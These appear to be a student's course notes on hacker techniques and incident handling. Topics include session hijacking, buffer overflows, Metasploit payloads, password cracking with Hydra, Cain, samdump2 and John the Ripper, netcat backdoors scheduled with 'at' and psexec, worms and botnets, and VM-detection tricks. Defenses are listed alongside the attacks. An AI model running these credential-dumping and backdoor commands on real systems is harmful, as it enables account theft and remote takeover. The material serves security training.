ACK Storm can be avoided using Ettercap and Eve becoming Man in the Middle by ARP Poisoning. Now Eve sniffs the packets destined for DD.DD… and Replay to BOB.

Whenever packets actually travel between Alice and Bob, Ettercap will "fix" the sequence number on those packets before forwarding them on. Alice and Bob don't notice any discontinuity in the sequence number stream, so no ACK storm results.

If Eve is far from Alic and Bob, Eve has to ARP Poison the routers/switches in between Eve and Alice, Eve and Bob.

Defense

Encrypted sessions prevent session hijacking because the attackers will not have the keys to encrypt or decrypt information. Therefore, an attacker cannot inject meaningful traffic into a session.

Use all defenses that apply for Sniffing and Spoofing

Identification

Users might report that they lose sessionsError messages from ssh that server keys are changed

Erradication

Check for rootkit and change the passwords

DNS Cache Poisoning

>> Search <<

Bufferover flows SANS_3B – 50:00

Stack Based Buffer Overflow

This can be exploited when input sanitization and input checking is not performed on the Application.

When a function call is made, The execution stops and the address is stored on stack so as to resume after completing the calling function.[Return PTR]

Current State of Registers is stored as Saved Frame PTR

In the Function Program memory for the variables are allocated and stored in the Stack Buffer. Suppose Input is more than what variable can hold, the input data overflows and overwrites the Return PTR.

Now when function completed and original program is resumed, It loads the value in Return PTR which is Overwritten due to malicious input.

Usually the value in Return Ptr is loaded with the address in Stack which hold Malicious Shell Code

Culprit: Input Bound Checking

1. Identify the buffer size, exactly speaking identify the location of EIPInput a pattern of input which is so long, when the application crashes, look into technical information – if the segmentation fault caused to trying to access a location which is the input sequence we have applied, like wise identify the location of EIP. [Bruteforce Fuzzing]

2. Exploit is tailored to operating system and architecture

3. If the exploit it large so that it do not fit into, then split the exploit.

Eg:, part of the exploit is one field, and remaining in another field. After overflow of one field, in shell code put a JMP to the code in another field.

4. One more method is Staged Loading: A small exploit is running, one came to end of the code it fetches next exploit data and load into same space and run again.

5. If you are not sure the exact location of exploit code, Use NOP NOP NOP NOP <EXPLOIT>. Now even the return pointer goes to NOP, it will follow and finally runs the Exploit.

Sploit

MetaSploit

Exploit: It is it that triggers the condition so that we can execute the code

Payload: The actual code that executes, it can be a machine code of Shell, some command to add another user etc

It has an arsenal of exploits.

Metasploit offers a huge set of payloads, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself. An attacker using Metasploit can choose from any of the following payloads to foist on a target:

Bind shell to current port. This payload opens a command shell listener on the target machine using the existing TCP connection of a service on the machine. The attacker can then feed commands to the victim system across the network to execute at a command prompt.

Bind shell to arbitrary port. This payload opens a command shell listener on any TCP port of the attacker's choosing on the target system.

Reverse shell. This payload shovels a shell back to the attacker on a TCP port. With this capability, the attacker can force the victim machine to initiate an outbound connection, sent to the attacker, polling the bad guy for commands to be executed on the victim machine. So, if a network or host-based firewall blocks inbound connections to the victim machine, the attacker can still force an outbound connection from the victim to the attacker, getting commands from

the attacker for the shell to execute. As we discuss in Chapter 8, Phase 3: Gaining Access Using Network Attacks, the attacker will likely have a Netcat listener waiting to receive the shoveled shell.

Windows VNC Server DLL Inject. This payload allows the attacker to control the GUI of the victim machine remotely, using the Virtual Network Computing (VNC) tool sent as a payload. VNC runs inside the victim process, so it doesn't need to be installed on the victim machine in advance. Instead, it is inserted as a DLL inside the vulnerable program to give the attacker remote control of the machine's screen and keyboard.

Reverse VNC DLL Inject. This payload inserts VNC as a DLL inside the running process, and then tells the VNC server to make a connection back to the attacker's machine, in effect shoveling the GUI to the attacker. That way, the victim machine initiates an outbound connection to the attacker, but allows the attacker to control the victim machine.

Inject DLL into running application. This payload injects an arbitrary DLL of the attacker's choosing into the vulnerable process, and creates a thread to run inside that DLL. Thus, the attacker can make any blob of code packaged as a DLL run on the victim.

Create Local Admin User. This payload creates a new user in the administrators group with a name and password specified by the attacker

The Meterpreter. This general-purpose payload carries a very special DLL to the target box. This DLL implements a simple shell, called the Metasploit Interpreter

o It does not create a new process, just runs inside the vulnerable app No Detection.

o It doesn’t touch hard drive No Evidence

o Although vulnerable application has limited access restrictions, Meterpreters commands have full previlegies Great control to Attacker

PRIV is an extension that is injected which has bunch of privilege escalation attacks, that can cause privilege escalation, so that even the user with limited privileges is exploited, attacker can run commands with admin privileges.

Meterpreter 3

Polymorphic Code –used to avoid detection of signatures by AV

o XOR – the exploit code with a key

o Randomized No OP Generator – Use the functional equivalents of code that does nothing e.g: multiplying AH with 1, Adding 0 to CX etc., at various places of exploit code to evade detection

Exercise:1. Most Machines have TFTP Client on it. So exploit the target machine and get a little shell on it.

2. On shell, execute Get NetCat using TFTP.

3. Use Firewalk to identify which packets are allowed and use corresponding mechanism to transfer files. [some firewalls block outgoing tftp port, then use ftp, if not use ssh]

4. Use Binding the shell or Reverse Shell to take control

Defending Apply Patches

Use HIPS

o They observe syscalls

o Look into memory – look for strange jumps

Non Executable Stacks

o On Windows, uses DEP (Data Execution Prevention)

o On Solaris, By default

o On Linux, there are patches by “Solar Designer”

Attacker: Ok.. No Problem..i will use functions which are in libc, ntdll.dll to workout malicious activity… I am just using those functional components which are necessary and allowed under application. – Return to glibc, Return to NTDll

Use StackShield: Stack Shield is a tool for adding protection to programs from this kind of attacks at compile time whitout changing a line of code. Stack Shield uses a more secure protection system than other tool like Immunix Stack Guard. Stack Shield is designed to support the GCC under a Linux Intel 386 class platform.

Avoid Programming Errors

Use Static Code Analysis Tools

Parser Vulnerabilities

IDS/IPS parses the datapackets to analyze and proceed through. There are some maliciously crafted packets which when parsed by IDS/IPS causes buffer overflow and thus causes IDS to blind. I.e., to the management it shows No suspicious packets (but actually not detecting it)

FileParsers are also causes bufferoverflow when opened a maliciously crafted file. Eg., when you open a JPEG file, it executes malicious code.

Format String Attacks

C:\Mahesh\Tools\NetCat>sort %x%x%x

7c812fd900The system cannot find the file specified.

7c812fd900 is the value on the stack.

%x reads and prints 4 bytes from stack

o this may leak sensitive data

%n writes the number of characters printed so far onto the stack

o this allow stack overflow attacks...

C format strings break the “don’t mix data & code” principle.

Easy to spot & fix:

o replace printf(str) by printf(“%s”, str)

>>>Checkout formatflaw.c<<<

>>>Some Exercises in last 20 mins<<<

Day 4

User Input Sanitization is the major culprit of these attacks such as buffer overlow, format sting attacks, sql injections etc., If the application is prone to such attacks, Attacker can inject a command shell to carry out further attacks.

Eg: Exploiting Unicode Vulnerability in Windows IIS

Password crackingPassword Crack resources: http://www.skullsecurity.org/wiki/index.php/Passwords

Default Passwords: http://www.phenoelit-us.org/dpl/dpl.html

Password Guessing:

Hydra: http://freeworld.thc.org/thc-hydra/It supports many protocols Telnet, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, and Cisco AAA

#hydra –l <user> -P <passworddictionary> -v <target> <protocol>

In the above it is bruteforcing 192.168.0.112 for user ftp with the list of passwords stored in passwords.txt

It is time-consuming and resource intensive They generate IDS Alerts Usually machines are configured to Account Lockouts after multiple login failures It can also be used as DOS Attack

Password Cracking:

Passwords are stored in either encrypted form or Hash (or Message Digest) on the machine that is used to authenticate the user before logging in.

Hybrid Password Cracking- the password-cracking tool starts guessing passwords using a dictionary term. Then, it creates other guesses by appending or prepending characters to the dictionary term. By methodically adding characters to words in a brute-force fashion.

Password Cracking for a botnet owner would be faily easy and simple.

Cain, a fantastic free tool available from Massimiliano Montoro at www.oxid.it/cain.html

John the Ripper, a powerful free password cracker for UNIX/Linux and some Windows passwords, written by Solar Designer, available at www.openwall.com/john

Pandora, a tool for testing Novell Netware, including password cracking, written by Simple Nomad, and available at www.nmrc.org/project/pandora

LC5, the latest incarnation of the venerable L0phtCrack password cracker, an easy-to-use but rather expensive commercial password cracker at www.atstake.com/products/lc/purchase.html

CAIN:

Its not just password cracker, it is a multitude of tools.

WLAN discovery like Netstumbler Identify if the target is sniffing packets Network Discovery Captures intresting Packets on network containing user ids etc A tool to dump and reveal all encrypted or hashed passwords cached on the local ma-

chine, including the standard Windows LM and NT password representations, as well as

the application-specific passwords for Microsoft Outlook, Outlook Express, Outlook Ex-press Identities, Outlook 2002, Microsoft Internet Explorer, and MSN Explorer.

An ARP cache poisoning tool, which can be used to redirect traffic on a LAN so that an attacker can more easily sniff in a switched environment

A remote command shell, rather like the backdoor command shells

A remote route table manager, so an administrator can tweak the packet routing rules on a Windows machine.

A remote TCP/UDP port viewer that lists local ports listening on the system running Abel, rather like the Active Ports and TCPView tools.

A remote Windows password hash dumper, which an attacker can use to retrieve the encrypted and hashed Windows password representations from the Security Accounts Manager (SAM)

Password Cracking On Windows

1. Retreive the LM Hash and NTLM Hash from SAM Database

2. Use Cain to crack it.

Retreiving Hashes

C:\Windows\repair\sam._ [original SAM file cannot be opened/copied]

Cain can retrieve LM / NTLM Hashes from Challenged Packets on network.

whenever anyone authenticates to the domain or tries to access a share, the attacker can run Cain in sniffing mode to snag user authentication information from the network.

So attacker can entice the victim to make such authentication eg: sending a mail to open a shared drive which needs authentication etc.,

It also supports Rainbow Tables.

Rainbow Tables - A rainbow table is a lookup table of pre computed hashes that can be matched with hash that needs to be cracked. It helps recovering plaintext passwords.

Salts make it difficult to crack using Rainbow tables. Usually they are 64 bit in most systems. Unfortunately salt not used for windows NTLM hashes.

Samdump2

To retrieve these hashes from a windows machine, Boot from a Linux and mount the C:\ and dump the SAM Database.

[root@~]#samdump2 /mnt/CPrimary/Windows/system32/config/SYSTEM / mnt/CPrimary/Windows/system32/config/SAM > samdb.txt

NOTE: SYSTEM should be dumped prior to dumping SAM, since if syskey is enabled, the SAM db is encrypted and it is stored in SYSTEM hive.

John The Ripper

A superb professional password cracking toolOn Linux, Retriving Hashes

/etc/passwd

In some linuxes, Hashes are stored in /etc/shadow (or /etc/secure)

#./unshadow <passwd file> <shadow file> > output.txt

To grab a copy of a shadow password file, an attacker must find a root-level exploit, such as a buffer overflow of program that runs as root or a related technique, to gain root access. After achieving root-level access, the attacker makes a copy of the shadow password file to crack.

Defenses:

Strong Password Policy

o Use alpha numeric, case, numbers

o Password Expiry after 30,60 or 90 days

o Use Password Filtering Softwares on the AD Server during account creation and password modification

Password Guardian, a commercial tool www.georgiasoftworks.com

Strongpass, a free tool http://ntsecurity.nu/toolbox

User Awareness

Where Possible, Use Authentication Tools Other Than Passwords

o Use RSA Tokens, Biometric access

Protect Hashes

o On Linux, active Password Shadowing. I.e., use /etc/shadow files which can be accessed only by root

o On Windows, Disable LM AuthenticationDefine HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

o Delete %systemroot%\repair\sam._

Exercise

1) create various accounts 2) combine password copy and shadow copy and retrieve3) Look at john the ripper Password.lst4) delete the accounts5) shread the files, which will replace with 0s and 1s so that they are removed from harddisk blocks.

----------------- break ----------------------

Shell Access On WindowsScenerio: Attacker has an accound created on victim and use remote connection to open C$ of vitims machine.Now Attacker copies netcat on to the victims machineNow attacker runs Z:\>nc –l –p 1545 –e cmd.exe [Z: on attacker machine is C:\ on vitims machine]Result: Attacker created a netcat lister on himself :P LOL…..

1. Connect to remote machine with administrative session

2. Copy netcat and a Batch file that run Netcat which listens on to target machine.

3. Configure Task Scheduler to run the Batch file

at \\computername time /interactive | /every:date,... /next:date,... command

at \\computername id /delete | /delete/yes

This will run netcat.bat everyday at 4:02 PM on the victim machine with SYSTEM Privileges.

Now Netcat is listening on the victim machine.

Alternately,

3. psexec from sysinternals is used to run executable on remote machines

Z:\>psexec \\victimmachine –c netcat.bat [copy the files]

Z:\>psexec \\victimmachine netcat.bat [Run the batch file]

Run Regedit interactively in the System account to view the contents of the SAM and SE-CURITY keys::

psexec -i -d -s c:\windows\regedit.exe

PSEXEC did not work out due to BlackIce which has blocked on the victim Machine.

Defences Do not let attacker get Admin access to the machine

Harden the ports

net session shows up what sessions are present on the machine net start shows what services are running Disable Scheduling if not required.

Containment Check the schedule tasks and delete it.

Kill the services/process that are listening

Erradication Identify the process and remove It

Check for Rootkits, If present rebuild the machine

RecoveryHarden the machine based on preparation

WORMA self replicating code that spreads across network.

Each instance is called segment.

They use vulnerabilities in applications, operating systems to spread across.Eg: Blaster worm uses buffer overflow vulnerability ins MS-RPC Dcom.From 2005, They started carrying bots which raise in botnets.

Multi Exploits – Nimda worms have 12 to 15 multiple exploits (multiple ways) to break into the machine.

Polymorphic worms – It recodes itself when it re-infects another machine to evade detection.1. Encrypt the Original code of worm with Random Key (a simple XOR) 2. Generate short Decryptor for Key (PD)3. This operation is done by Polymorphic Engine(PE) which is included with worm’s code.

Open source Toolkit to Mutate Exploits – ADMMutate, CLET, and JempiScodes.

They can place a Trojan, Backdoors which made raise of Botnet.

Metamorphic Worms – It changes its functionality. It might download from C&C.

Defences Bufferover flow protection

Process for Rapid Patching

Use HIDS, NIDS. Also Contact Network Management Personnel to identify Chokepoints at various places inside organization where you can place Filters.

Encrypt your desktops, laptop with softwares like PointSec,so that even if bot gets in, it will not play with the data.

Propagation: Emails, Browser exploits, Drive by downloads

Mechanism for Botnet controls:

IRC from Command & Control Server – Most Popular Mechanism

Some Bots periodically login to some user on myspace, or some blogs to see the commands stored in it.

Distributed P2P communication channels. Commands injected on one bot, remaining bots check for updates with its neighbor bots and takes the command and spreads thereafter. Now the problem with single C&C is resolved. Botnet becomes self-aware.

Botnets Detecting Virtual Machines

Since Virtual machines are used to analyse malwares, they detect that they are run in virtual machine and shuts its malicious activity.

Check into memory artifacts – file system, Registry, and running process of the machine

Redpill – o Executes instruction SIDT, It saves the address of Interrupt Descriptor Tableso If its running in Original machine, the address is in lower memory (< 0xd0) near

operating system kernel.o If it is running in VM, the address value is higher

Scoopy doo – SIDT. SGDT. SLDTSIDT – Store Interrupt Descriptor TableSGDT - Store Global Descriptor TableSLDT – Store Local Descriptor table

o If these values are consistent with virtualization, You are virtualization

Look for Virtualized Hardware o Look at MAC, Device Drivers, Interface

VMDetect – It runs Instructions that only virtual machines executes and it results as invalid instruction when run on original machine.

VMware Backdoor I/O Port Look for change in processor behavior that are associated with communications channel.

Clock synchronization, Copy+paste, Drag Drop etc happens over this COM Channel.

The following operation invokes Backdoor functions:

/* in Intel syntax (MASM and most Windows based assemblers) */

MOV EAX, 564D5868h /* magic number */ MOV EBX, command-specific-parameter MOV CX, backdoor-command-number MOV DX, 5658h /* VMware I/O Port */

IN EAX, DX (or OUT DX, EAX)

/* in AT&T syntax (gnu as and many unix based assemblers) */

movl $0x564D5868, %eax; /* magic number */ movl command-specific-parameter, %ebx; movw backdoor-command-number, %cx; movw $0x5658, %dx; /* VMware I/O port */

inl %dx, %eax; (or outl %eax, %dx)In appearance it is just a straight forward I/O access operation.

Depending on the command number that was passed to EBX, different operations are carried out.

Source Code -----------

http://chitchat.at.infoseek.co.jp/vmware/backdoor.html